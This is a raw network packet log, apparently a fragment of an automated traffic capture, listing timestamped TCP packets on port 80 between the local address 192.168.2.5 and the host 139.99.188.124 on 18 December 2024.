                                                                    Dec 18, 2024 09:13:15.813898087 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.813987970 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.814191103 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.814214945 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.814265013 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.814990997 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.815073967 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.815125942 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.815829039 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.815888882 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.816010952 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.816591024 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.816685915 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.816736937 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.817408085 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.817605972 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.817656994 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.818217039 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.818394899 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.818442106 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.818994999 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.819113970 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.819228888 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.819832087 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.819947004 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.819992065 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.820635080 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.820724964 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.820779085 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.821422100 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.821611881 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.821660995 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.822247028 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.822386980 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.822434902 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.823056936 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.823198080 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.823242903 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.823844910 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.823949099 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.823998928 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.824645996 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.824765921 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.824815035 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.825494051 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.825565100 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.825670004 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.826267958 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.826349974 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.826397896 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.827115059 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.827162027 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.827272892 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.827862978 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.827963114 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.828015089 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.828671932 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.828777075 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.828833103 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.829482079 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.829613924 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.829665899 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.830303907 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.830411911 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.830460072 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.831104994 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.831299067 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.831532001 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.831933022 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.832039118 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.832130909 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.832683086 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.832833052 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.832889080 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.833504915 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.833601952 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.833755970 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.834314108 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.834379911 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.834428072 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.835108042 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.835223913 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.835736036 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.835922956 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.836026907 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.836149931 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.836715937 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.836823940 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.836870909 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.837517977 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.837637901 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.837703943 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.838356018 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.838536978 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.838582993 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.839138985 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.839251995 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.839365959 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.840070963 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.840137959 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.840188980 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.840758085 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.841145039 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.841473103 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.841573000 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.841671944 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.841715097 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.842354059 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.842473984 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.842514992 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.843172073 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.843260050 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.843461990 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.843946934 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.844084978 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.844187021 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.844774008 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.910489082 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.917349100 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:16.671950102 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:18.933710098 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:19.053173065 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:19.053276062 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:19.053615093 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:19.173088074 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.553158998 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.553169966 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.553184032 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.553248882 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.553282022 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.553292036 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.553328991 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.553338051 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.553353071 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.553360939 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.553422928 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.553580999 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.553659916 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.553709030 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.672879934 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.672977924 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.673027039 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.677485943 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.763267994 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.763328075 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.763389111 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.767492056 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.767543077 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.767751932 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.775891066 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.775942087 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.775999069 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.784274101 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.784315109 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.784557104 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.792602062 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.792639017 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.792680025 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.800996065 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.801049948 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.801188946 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.809335947 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.809374094 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.809511900 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.817701101 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.817743063 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.817789078 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.826128960 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.826169968 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.826220989 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.834507942 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.834544897 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.834574938 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.882862091 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.882909060 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.882936954 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.973157883 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.973212957 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.973232985 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.975832939 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.975949049 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.976866961 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.976989985 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.977066040 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.982554913 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.982639074 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.982781887 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.987013102 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.987024069 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.987860918 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.992578983 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.992592096 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.992682934 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:20.998269081 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.998466015 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.998737097 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.003906965 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.003974915 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.004026890 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.009512901 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.009742022 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.009979963 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.015202999 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.015320063 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.016156912 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.019381046 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.019557953 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.023192883 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.023718119 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.023839951 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.023998976 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.027832031 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.027842999 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.028069973 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.032090902 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.032099962 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.035422087 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.037210941 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.037365913 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.037864923 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.040770054 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.040807962 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.040885925 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.044519901 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.044615030 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.044814110 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.048681974 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.150986910 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.164370060 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.164385080 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.164483070 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.165993929 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.166167021 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.166294098 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.169364929 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.182578087 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.182712078 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.182895899 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.183779001 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.183828115 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.183984041 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.186897993 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.186950922 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.187016964 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.189472914 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.189522982 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.189616919 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.192811966 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.192872047 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.192954063 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.196146011 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.196227074 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.196258068 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.199495077 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.199512005 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.199668884 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.202835083 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.202931881 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.202965021 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.206176996 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.206264973 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.206335068 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.209506035 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.209614038 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.209817886 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.212789059 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.212913990 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.213273048 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.216140032 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.216242075 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.216308117 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.219492912 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.219614029 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.219641924 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.222798109 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.222893000 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.222908974 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.226133108 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.226186991 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.226227045 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.229465008 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.229517937 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.229576111 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.232830048 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.232893944 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.232933998 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.236165047 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.236227989 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.236403942 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.239500999 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.239567995 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.239593983 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.242789984 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.242892981 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.242899895 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.246179104 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.246323109 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.246390104 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.249474049 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.249634027 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.249705076 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.252795935 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.252871037 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.252902985 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.256167889 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.256263018 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.256268024 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.259443045 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.259480953 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.259507895 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.262799025 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.262871027 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.262903929 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.266123056 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.266206026 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.355511904 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.355588913 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.355884075 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.357176065 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.357285976 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.358112097 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.360511065 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.360629082 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.361488104 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.363795042 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.392571926 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.392646074 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.392656088 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.393342972 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.393449068 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.393521070 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.395982027 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.396090984 CET8049729139.99.188.124192.168.2.5
